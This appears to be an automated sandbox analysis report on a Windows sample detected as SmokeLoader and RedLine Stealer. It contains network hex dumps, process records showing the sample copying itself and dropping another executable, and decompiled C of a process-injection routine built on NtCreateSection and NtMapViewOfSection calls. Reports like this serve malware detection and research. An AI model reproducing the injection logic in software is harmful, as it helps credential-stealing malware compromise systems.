                                                          2023-01-03 08:46:54 UTC609INData Raw: 32 30 30 30 0d 0a 94 94 8b a3 9e 98 88 a6 89 80 87 a2 88 93 8a a4 9d 7e 80 a1 80 8e 81 97 92 90 95 9f 91 91 95 a4 94 89 a0 98 92 98 95 b3 a0 a5 9a 9e 80 81 7f a8 7e 81 80 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 80 80 96 7e 7f 80 ac a4 ab a6 99 95 a2 9c a9 a7 a5 94 a9 9b 9c 9b a4 a1 aa 9f a3 9b 9e 95 a0 a6 a1 a1 ab 9b a0 a2 a7 a6 95 aa aa a1 91 a8 ae a4 a5 8f a0 96 a1 9a b6 7f 7f 7f af 76 80 80 9d 66 81 7e a6 71 80 7e b5 80 80 7f 9d 80 80 7e a8 81 7f 7f a1 82 83 8a a6 8d 9a 98 a2 98 96 91 99 97 8e 91 a6 8e 9a 9c 94 8b 93 87 ae 9c 94 8c b8 87 9c 8f a7 9c 90 9d 9e 90 8d 94 a9 91 87 97 a6 99 99 86 a9 99 97 88 ac 97 88 9d a8 84 9b 9c a1 8a 9a 7e a6 93 92 99 a7 8d 84 95 b1 8c a3 9a b4 80 81 7e af 80 7f 7f 9f 00 00 00 00 00
                                                          Data Ascii: 2000~~~vf~q~~~~
                                                          2023-01-03 08:46:54 UTC617INData Raw: 89 ae 84 84 93 a2
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC617INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC617INData Raw: 32 30 30 30 0d 0a 91 95 8c a9 94 92 96 aa 96 9f 90 a3 8f 99 93 9f 94 88 8a ae 90 99 8e a4 96 96 94 aa a3 8b 9e 9e 81 7f 7e b3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 7e 9c 83 8c 88 ae 9d a5 9f a2 9d 9d 93 ab 9c 9e 9b 9d 99 a1 92 9e 95 9e 8c 98 8c 9d 96 a7 9a 93 94 ac 80 80 84 a2 76 7f 7e ac 80 7f 80 a7 81 7f 91 9f 81 80 7f a3 80 80 7f ab 80 7e 81 a5 80 80 80 a6 93 8f 92 ad 9b 93 8e a7 8e 9d 8f a9 83 8f 9d a6 8a 93 97 a4 9b 90 8f b3 9b 9f 95 aa 95 7f 8d a2 99 9a 9a a5 9a 99 a2 a0 80 80 80 a5 a3 7f 80 56 00 00 00 00 00 00 00 00 00 00 00 00 7f 7f 81 a4 8c 85 8a a8 9c b3 a3 a9 98 ab a0 b2 a6 94 a1 b4 a0 99 9e a8 9f a5 99 ac 95 9b 92 ac 93 99 a5 ac a5 a4 99 b8 77 7f 80 ab 80 7e 97 a6 7f ac a2 ad 7f ad 9f a0 80 7e ad 9c 80 7f 80 b3 80 81 7e ae 80
                                                          Data Ascii: 2000~~v~~Vw~~~
                                                          2023-01-03 08:46:54 UTC625INData Raw: 00 69 69 69 69 00
                                                          Data Ascii: iiii
                                                          2023-01-03 08:46:54 UTC625INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC625INData Raw: 32 30 30 30 0d 0a 69 00 00 00 00 69 69 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 69 69 69 69 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 69 69 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: 2000iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
                                                          2023-01-03 08:46:54 UTC633INData Raw: f4 36 28 38 2c 38
                                                          Data Ascii: 6(8,8
                                                          2023-01-03 08:46:54 UTC633INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC633INData Raw: 65 34 38 0d 0a 30 38 34 38 38 38 3c 38 40 38 44 38 48 38 4c 38 d0 3c c8 3d 30 3e 40 3e 50 3e 60 3e 70 3e 94 3e a0 3e a4 3e a8 3e ac 3e b0 3e b8 3e bc 3e c0 3e c4 3e d4 3e dc 3e e4 3e ec 3e f4 3e fc 3e 04 3f 0c 3f 14 3f 1c 3f 24 3f 2c 3f 34 3f 3c 3f 44 3f 4c 3f 54 3f 5c 3f 64 3f 6c 3f 74 3f 7c 3f 84 3f 8c 3f 94 3f 9c 3f a4 3f ac 3f b4 3f e0 3f e4 3f e8 3f ec 3f f0 3f f4 3f f8 3f fc 3f 00 20 01 00 70 00 00 00 00 30 04 30 08 30 0c 30 10 30 14 30 18 30 1c 30 20 30 24 30 28 30 2c 30 30 30 34 30 38 30 3c 30 40 30 44 30 48 30 4c 30 50 30 54 30 58 30 5c 30 60 30 64 30 68 30 6c 30 70 30 74 30 78 30 7c 30 80 30 84 30 88 30 8c 30 90 30 a0 30 a8 30 ac 30 b0 30 b4 30 b8 30 bc 30 c0 30 c4 30 c8 30 cc 30 d8 30 c0 31 c4 31 40 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: e48084888<8@8D8H8L8<=0>@>P>`>p>>>>>>>>>>>>>>>>>????$?,?4?<?D?L?T?\?d?l?t?|???????????????? p00000000 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|00000000000000000011@5


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:1
                                                          Start time:09:44:59
                                                          Start date:03/01/2023
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\file.exe
                                                          Imagebase:0x400000
                                                          File size:341504 bytes
                                                          MD5 hash:D0BF82E7840B3179B85D665A3AE895A5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.448104773.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000003.363432938.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low

                                                          Target ID:6
                                                          Start time:09:45:40
                                                          Start date:03/01/2023
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff69bc80000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high

                                                          Target ID:9
                                                          Start time:09:46:26
                                                          Start date:03/01/2023
                                                          Path:C:\Users\user\AppData\Roaming\vgfsabt
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\vgfsabt
                                                          Imagebase:0x400000
                                                          File size:341504 bytes
                                                          MD5 hash:D0BF82E7840B3179B85D665A3AE895A5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low

                                                          Target ID:10
                                                          Start time:09:46:54
                                                          Start date:03/01/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\1E3.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\1E3.exe
                                                          Imagebase:0x400000
                                                          File size:650752 bytes
                                                          MD5 hash:B2FDE4A8B7D6AA7E0FA7F853899F1C4F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:3.6%
                                                            Dynamic/Decrypted Code Coverage:57.5%
                                                            Signature Coverage:26.1%
                                                            Total number of Nodes:153
                                                            Total number of Limit Nodes:12
                                                            execution_graph 6138 401620 6139 401625 6138->6139 6140 4016c3 NtDuplicateObject 6139->6140 6142 401998 6139->6142 6141 4016e0 NtCreateSection 6140->6141 6140->6142 6143 401760 NtCreateSection 6141->6143 6144 401706 NtMapViewOfSection 6141->6144 6143->6142 6146 40178c 6143->6146 6144->6143 6145 401729 NtMapViewOfSection 6144->6145 6145->6143 6147 401747 6145->6147 6146->6142 6148 401796 NtMapViewOfSection 6146->6148 6147->6143 6148->6142 6149 4017bd NtMapViewOfSection 6148->6149 6149->6142 6150 4017df 6149->6150 6150->6142 6151 4017e4 3 API calls 6150->6151 6151->6142 6094 401a01 6095 401a02 6094->6095 6096 401a3f Sleep 6095->6096 6097 401a5a 6096->6097 6098 401615 10 API calls 6097->6098 6099 401a6b 6097->6099 6098->6099 6040 402fa3 6042 402fb5 6040->6042 6043 403041 6042->6043 6044 4019f2 6042->6044 6045 401a02 6044->6045 6046 401a3f Sleep 6045->6046 6047 401a5a 6046->6047 6049 401a6b 6047->6049 6050 401615 6047->6050 6049->6043 6051 401625 6050->6051 6052 4016c3 NtDuplicateObject 6051->6052 6058 401998 6051->6058 6053 4016e0 NtCreateSection 6052->6053 6052->6058 6054 401760 NtCreateSection 6053->6054 6055 401706 NtMapViewOfSection 6053->6055 6057 40178c 6054->6057 6054->6058 6055->6054 6056 401729 NtMapViewOfSection 6055->6056 6056->6054 6059 401747 6056->6059 6057->6058 6060 401796 NtMapViewOfSection 6057->6060 6058->6049 6059->6054 6060->6058 6061 4017bd NtMapViewOfSection 6060->6061 6061->6058 6062 4017df 6061->6062 6062->6058 6064 4017e4 6062->6064 6065 4017e6 6064->6065 6070 4017df 6064->6070 6066 401770 NtCreateSection 6065->6066 6065->6070 6067 40178c 6066->6067 6066->6070 6068 401796 NtMapViewOfSection 6067->6068 6067->6070 6069 4017bd NtMapViewOfSection 6068->6069 6068->6070 6069->6070 6070->6058 6071 40b484 6073 40b496 _malloc 6071->6073 6074 40b523 6071->6074 6072 40b4f3 RtlAllocateHeap 6072->6073 6073->6072 6073->6074 6259 402f24 6261 402fac 6259->6261 6260 4019f2 11 API calls 6262 403041 6260->6262 6261->6260 6261->6262 6251 40b54e 6252 40b55a 6251->6252 6253 40b484 _malloc RtlAllocateHeap 6252->6253 6254 40b569 _realloc 6252->6254 6253->6254 6075 53003c 6076 530049 6075->6076 6088 530e0f SetErrorMode SetErrorMode 6076->6088 6081 530265 6082 5302ce VirtualProtect 6081->6082 6084 53030b 6082->6084 6083 530439 VirtualFree 6087 5304be LoadLibraryA 6083->6087 6084->6083 6086 5308c7 6087->6086 6089 530223 6088->6089 6090 530d90 6089->6090 6091 530dad 6090->6091 6092 530dbb GetPEB 6091->6092 6093 530238 VirtualAlloc 6091->6093 6092->6093 6093->6081 6112 530001 6113 530005 6112->6113 6118 53092b GetPEB 6113->6118 6115 530030 6120 53003c 6115->6120 6119 530972 6118->6119 6119->6115 6121 530049 6120->6121 6122 530e0f 2 API calls 6121->6122 6123 530223 6122->6123 6124 530d90 GetPEB 6123->6124 6125 530238 VirtualAlloc 6124->6125 6126 530265 6125->6126 6127 5302ce VirtualProtect 6126->6127 6129 53030b 6127->6129 6128 530439 VirtualFree 6132 5304be LoadLibraryA 6128->6132 6129->6128 6131 5308c7 6132->6131 6133 530005 6134 53092b GetPEB 6133->6134 6135 530030 6134->6135 6136 53003c 7 API calls 6135->6136 6137 530038 6136->6137 6180 40949f 6183 409313 6180->6183 6184 409327 6183->6184 6191 40cd42 6184->6191 6186 409347 6188 40cd42 __forcdecpt_l RtlAllocateHeap 6186->6188 6190 409350 6188->6190 6189 409333 6189->6186 6195 40a9d1 6189->6195 6192 40cd60 6191->6192 6193 40cd50 6191->6193 6200 40cc2d 6192->6200 6193->6189 6196 40a9f1 6195->6196 6197 40a9df 6195->6197 6247 40a980 6196->6247 6197->6189 6201 40cc42 6200->6201 6202 40cc4e 6201->6202 6204 40cca2 __isleadbyte_l 6201->6204 6205 40cc66 6202->6205 6207 40a7e0 6202->6207 6211 40c4f1 6204->6211 6205->6193 6208 40a7f4 __isleadbyte_l 6207->6208 6210 40a801 6208->6210 6215 40c6f0 6208->6215 6210->6205 6212 40c504 6211->6212 6234 40c14c 6212->6234 6214 40c524 6214->6205 6216 40c703 6215->6216 6219 40c536 6216->6219 6218 40c720 6218->6210 6220 40c557 6219->6220 6221 40c669 ___ansicp 6220->6221 6223 40c56f 6220->6223 6225 40c5fd __freea ___convertcp 6221->6225 6230 40d9e8 6221->6230 6223->6225 6226 40b484 6223->6226 6225->6218 6228 40b496 _malloc 6226->6228 6229 40b523 6226->6229 6227 40b4f3 RtlAllocateHeap 6227->6228 6228->6227 6228->6229 6229->6225 6231 40da28 6230->6231 6233 40da8a __freea ___convertcp 6230->6233 6232 40b484 _malloc RtlAllocateHeap 6231->6232 6231->6233 6232->6233 6233->6225 6235 40c16d 6234->6235 6236 40c386 ___ansicp 6235->6236 6238 40c1e2 6235->6238 6237 40d9e8 ___convertcp RtlAllocateHeap 6236->6237 6242 40c2bc __freea ___convertcp 6236->6242 6240 40c3d9 6237->6240 6239 40b484 _malloc RtlAllocateHeap 6238->6239 6241 40c241 ___convertcp 6238->6241 6238->6242 6239->6241 6240->6242 6243 40c416 ___convertcp 6240->6243 6244 40b484 _malloc RtlAllocateHeap 6240->6244 6241->6242 6245 40b484 _malloc RtlAllocateHeap 6241->6245 6242->6214 6243->6242 6246 40d9e8 ___convertcp RtlAllocateHeap 6243->6246 6244->6243 6245->6242 6246->6242 6248 40a993 6247->6248 6249 40a7e0 __isctype_l RtlAllocateHeap 6248->6249 6250 40a9ad 6248->6250 6249->6250 6250->6189

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 85 401615-40166d call 4012a4 97 401672-401677 85->97 98 40166f 85->98 100 40199a-4019a2 97->100 101 40167d-40168e 97->101 98->97 100->97 104 4019a7-4019ef call 4012a4 100->104 105 401694-4016bd 101->105 106 401998 101->106 105->106 113 4016c3-4016da NtDuplicateObject 105->113 106->104 113->106 115 4016e0-401704 NtCreateSection 113->115 118 401760-401786 NtCreateSection 115->118 119 401706-401727 NtMapViewOfSection 115->119 118->106 122 40178c-401790 118->122 119->118 121 401729-401745 NtMapViewOfSection 119->121 121->118 124 401747-40175d 121->124 122->106 125 401796-4017b7 NtMapViewOfSection 122->125 124->118 125->106 127 4017bd-4017d9 NtMapViewOfSection 125->127 127->106 130 4017df 127->130 130->106 131 4017df call 4017e4 130->131 131->106
                                                            C-Code - Quality: 48%
                                                            			E00401615(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, signed int _a1750575217) {
                                                            				void* _v3;
                                                            				void* _v8;
                                                            				long _v12;
                                                            				void* _v16;
                                                            				void* _v20;
                                                            				char _v44;
                                                            				char _v52;
                                                            				long _v56;
                                                            				long _v60;
                                                            				char _v64;
                                                            				char _v68;
                                                            				HANDLE* _v72;
                                                            				char _v76;
                                                            				char _v84;
                                                            				char _v88;
                                                            				intOrPtr _v96;
                                                            				char _v100;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t91;
                                                            				intOrPtr _t93;
                                                            				void* _t96;
                                                            				intOrPtr _t97;
                                                            				struct _GUID _t103;
                                                            				signed char* _t105;
                                                            				PVOID* _t107;
                                                            				PVOID* _t111;
                                                            				PVOID* _t113;
                                                            				void* _t117;
                                                            				intOrPtr _t118;
                                                            				void* _t120;
                                                            				void** _t121;
                                                            				signed char _t124;
                                                            				void* _t128;
                                                            				void* _t129;
                                                            				signed char _t130;
                                                            				void* _t131;
                                                            				void* _t133;
                                                            				HANDLE* _t134;
                                                            				intOrPtr* _t137;
                                                            				intOrPtr* _t138;
                                                            				void* _t141;
                                                            				long _t156;
                                                            
                                                            				_push(0x165f);
                                                            				_t91 =  *_t137;
                                                            				_t138 = _t137 + 4;
                                                            				__eax = __eax | 0x68e1228a;
                                                            				__eflags = __eax;
                                                            				_t128 = 0xfd;
                                                            				L004012A4(_t91, _t117, 0x38c, _t128, _t131, _t133, _t141);
                                                            				asm("cld");
                                                            				asm("invalid");
                                                            				_t118 = _a4;
                                                            				_v56 = 0;
                                                            				if(gs != 0) {
                                                            					_v56 = _v56 + 1;
                                                            				}
                                                            				while(1) {
                                                            					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
                                                            					if(_t93 != 0) {
                                                            						break;
                                                            					}
                                                            					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
                                                            				}
                                                            				_v96 = _t93;
                                                            				_t134 =  &_v100;
                                                            				 *_t134 = 0;
                                                            				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t134);
                                                            				_t96 =  *_t134;
                                                            				if(_t96 != 0) {
                                                            					_t121 =  &_v52;
                                                            					 *_t121 = _t96;
                                                            					_t121[1] = 0;
                                                            					_t134 =  &_v44;
                                                            					 *((intOrPtr*)(_t118 + 0x10))(_t134, 0x18);
                                                            					 *_t134 = 0x18;
                                                            					_t130 = _t134;
                                                            					_push( &_v52);
                                                            					_push(_t130);
                                                            					_push(0x40);
                                                            					_push( &_v20);
                                                            					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
                                                            						_v12 = 0;
                                                            						_t103 =  &_v84;
                                                            						 *((intOrPtr*)(_t103 + 4)) = 0;
                                                            						 *_t103 = 0x5000;
                                                            						_t134 =  &_v88;
                                                            						if(NtCreateSection(_t134, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
                                                            							_push(_v84);
                                                            							_pop( *_t25);
                                                            							_t111 =  &_v72;
                                                            							 *_t111 = 0;
                                                            							if(NtMapViewOfSection( *_t134, 0xffffffff, _t111, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                            								_t113 =  &_v64;
                                                            								 *_t113 = 0;
                                                            								if(NtMapViewOfSection( *_t134, _v16, _t113, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                            									_t134 = _v72;
                                                            									 *((intOrPtr*)(_t118 + 0x20))(0, _t134, 0x104);
                                                            									_t134[0x82] = _a16;
                                                            									_v12 = _v12 + 1;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t105 =  &_v84;
                                                            						_t124 = _a12 + 0x10000;
                                                            						_t105[4] = 0;
                                                            						 *_t105 = _t124;
                                                            						while(1) {
                                                            							_a1750575217 = _a1750575217 | _t124;
                                                            							 *_t105 =  &(_t105[ *_t105]);
                                                            							 *_t105 =  *_t105 + _t124;
                                                            							_push(0x40);
                                                            							_push(_t105);
                                                            							_push(0);
                                                            							_push(0xe);
                                                            							if(NtCreateSection(_t134) != 0 || _v12 == 0) {
                                                            								goto L75;
                                                            							}
                                                            							_push(_v84);
                                                            							_pop( *_t47);
                                                            							_t107 =  &_v76;
                                                            							 *_t107 = 0;
                                                            							if(NtMapViewOfSection( *_t134, 0xffffffff, _t107, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                            								_t109 =  &_v68;
                                                            								 *_t109 = 0;
                                                            								_t124 =  &_v60;
                                                            								_push(0x20);
                                                            								while(1) {
                                                            									 *0x0000006A =  *0x0000006A & _t130;
                                                            									 *((intOrPtr*)(_t124 + 0x57)) =  *((intOrPtr*)(_t124 + 0x57)) + _t130;
                                                            									_push(0);
                                                            									_push(0);
                                                            									_push(_t109);
                                                            									_push(_v16);
                                                            									_t109 = NtMapViewOfSection( *_t134);
                                                            									_t156 = _t109;
                                                            									if(_t156 != 0) {
                                                            										goto L75;
                                                            									}
                                                            									L28();
                                                            									if(_t156 == 0 && _t156 != 0) {
                                                            										asm("out dx, al");
                                                            										if(_t156 > 0) {
                                                            											continue;
                                                            										} else {
                                                            											if (_t156 > 0) goto L22;
                                                            											goto L32;
                                                            										}
                                                            									}
                                                            									goto L75;
                                                            								}
                                                            							}
                                                            							goto L75;
                                                            						}
                                                            					}
                                                            				}
                                                            				L75:
                                                            				_push(0x165f);
                                                            				_t97 =  *_t138;
                                                            				_t120 = 0x38c;
                                                            				_t129 = 0xfd;
                                                            				L004012A4(_t97, _t118, _t120, _t129, 0, _t134, __eflags);
                                                            				return _t97;
                                                            			}















































                                                            0x00401625
                                                            0x0040162a
                                                            0x0040162d
                                                            0x00401649
                                                            0x00401649
                                                            0x00401652
                                                            0x0040165a
                                                            0x0040165c
                                                            0x0040165d
                                                            0x0040165f
                                                            0x00401664
                                                            0x0040166d
                                                            0x0040166f
                                                            0x0040166f
                                                            0x00401672
                                                            0x00401672
                                                            0x00401677
                                                            0x00000000
                                                            0x00000000
                                                            0x0040199f
                                                            0x0040199f
                                                            0x0040167d
                                                            0x00401680
                                                            0x00401683
                                                            0x00401687
                                                            0x0040168a
                                                            0x0040168e
                                                            0x00401694
                                                            0x00401697
                                                            0x00401699
                                                            0x0040169c
                                                            0x004016a2
                                                            0x004016a5
                                                            0x004016ab
                                                            0x004016b3
                                                            0x004016b4
                                                            0x004016b5
                                                            0x004016b7
                                                            0x004016bd
                                                            0x004016e0
                                                            0x004016e3
                                                            0x004016e6
                                                            0x004016e9
                                                            0x004016ef
                                                            0x00401704
                                                            0x00401706
                                                            0x00401709
                                                            0x0040170c
                                                            0x0040170f
                                                            0x00401727
                                                            0x00401729
                                                            0x0040172c
                                                            0x00401745
                                                            0x00401747
                                                            0x00401751
                                                            0x00401757
                                                            0x0040175d
                                                            0x0040175d
                                                            0x00401745
                                                            0x00401727
                                                            0x00401760
                                                            0x00401766
                                                            0x0040176c
                                                            0x0040176f
                                                            0x00401770
                                                            0x00401770
                                                            0x00401776
                                                            0x00401778
                                                            0x0040177a
                                                            0x0040177c
                                                            0x0040177d
                                                            0x0040177e
                                                            0x00401786
                                                            0x00000000
                                                            0x00000000
                                                            0x00401796
                                                            0x00401799
                                                            0x0040179c
                                                            0x0040179f
                                                            0x004017b7
                                                            0x004017bd
                                                            0x004017c0
                                                            0x004017c2
                                                            0x004017c5
                                                            0x004017c6
                                                            0x004017c6
                                                            0x004017c9
                                                            0x004017cc
                                                            0x004017cd
                                                            0x004017ce
                                                            0x004017cf
                                                            0x004017d4
                                                            0x004017d7
                                                            0x004017d9
                                                            0x00000000
                                                            0x00000000
                                                            0x004017df
                                                            0x004017e4
                                                            0x004017e8
                                                            0x004017e9
                                                            0x00000000
                                                            0x004017eb
                                                            0x004017eb
                                                            0x00000000
                                                            0x004017eb
                                                            0x004017e9
                                                            0x00000000
                                                            0x004017e4
                                                            0x004017c6
                                                            0x00000000
                                                            0x004017b7
                                                            0x00401770
                                                            0x004016bd
                                                            0x00401998
                                                            0x004019ae
                                                            0x004019b3
                                                            0x004019ca
                                                            0x004019de
                                                            0x004019e6
                                                            0x004019ef

                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 360ad1a724b6dfd7efdf9099856e6addfa1f1d81a22987e82f57d8afae1e1ec3
                                                            • Instruction ID: b20ec665c7e4e3296b0f18af3c28397e7cf24639ebe04dcdbabd140aff290070
                                                            • Opcode Fuzzy Hash: 360ad1a724b6dfd7efdf9099856e6addfa1f1d81a22987e82f57d8afae1e1ec3
                                                            • Instruction Fuzzy Hash: 376160B0500249FBEB209F95CC49FEF7BB8EF91B00F14416AF912BA1E4D6759901DB25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 132 401636-40166d call 4012a4 142 401672-401677 132->142 143 40166f 132->143 145 40199a-4019a2 142->145 146 40167d-40168e 142->146 143->142 145->142 149 4019a7-4019ef call 4012a4 145->149 150 401694-4016bd 146->150 151 401998 146->151 150->151 158 4016c3-4016da NtDuplicateObject 150->158 151->149 158->151 160 4016e0-401704 NtCreateSection 158->160 163 401760-401786 NtCreateSection 160->163 164 401706-401727 NtMapViewOfSection 160->164 163->151 167 40178c-401790 163->167 164->163 166 401729-401745 NtMapViewOfSection 164->166 166->163 169 401747-40175d 166->169 167->151 170 401796-4017b7 NtMapViewOfSection 167->170 169->163 170->151 172 4017bd-4017d9 NtMapViewOfSection 170->172 172->151 175 4017df 172->175 175->151 176 4017df call 4017e4 175->176 176->151
                                                            C-Code - Quality: 53%
                                                            			E00401636(void* __eax) {
                                                            				void* _t91;
                                                            				intOrPtr _t93;
                                                            				void* _t96;
                                                            				intOrPtr _t97;
                                                            				struct _GUID _t103;
                                                            				signed char* _t105;
                                                            				PVOID* _t107;
                                                            				PVOID* _t111;
                                                            				PVOID* _t113;
                                                            				void* _t117;
                                                            				intOrPtr _t118;
                                                            				void* _t121;
                                                            				void** _t122;
                                                            				signed char _t125;
                                                            				void* _t129;
                                                            				void* _t130;
                                                            				signed char _t131;
                                                            				void* _t132;
                                                            				HANDLE* _t136;
                                                            				void* _t139;
                                                            				void* _t140;
                                                            				intOrPtr* _t142;
                                                            				void* _t146;
                                                            				long _t161;
                                                            
                                                            				_t91 = __eax;
                                                            				__eax = __eax | 0x68e1228a;
                                                            				__eflags = __eax;
                                                            				_t129 = 0xfd;
                                                            				L004012A4(_t91, _t117, 0x38c, _t129, _t132, 0xf9e70ceb, _t146);
                                                            				_t140 = _t139 + 1;
                                                            				asm("cld");
                                                            				asm("invalid");
                                                            				_t118 =  *((intOrPtr*)(_t140 + 8));
                                                            				 *((intOrPtr*)(_t140 - 0x34)) = 0;
                                                            				if(gs != 0) {
                                                            					 *((intOrPtr*)(_t140 - 0x34)) =  *((intOrPtr*)(_t140 - 0x34)) + 1;
                                                            				}
                                                            				while(1) {
                                                            					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
                                                            					if(_t93 != 0) {
                                                            						break;
                                                            					}
                                                            					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
                                                            				}
                                                            				 *((intOrPtr*)(_t140 - 0x5c)) = _t93;
                                                            				_t136 = _t140 - 0x60;
                                                            				 *_t136 = 0;
                                                            				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t136);
                                                            				_t96 =  *_t136;
                                                            				if(_t96 != 0) {
                                                            					_t122 = _t140 - 0x30;
                                                            					 *_t122 = _t96;
                                                            					_t122[1] = 0;
                                                            					_t136 = _t140 - 0x28;
                                                            					 *((intOrPtr*)(_t118 + 0x10))(_t136, 0x18);
                                                            					 *_t136 = 0x18;
                                                            					_t131 = _t136;
                                                            					_push(_t140 - 0x30);
                                                            					_push(_t131);
                                                            					_push(0x40);
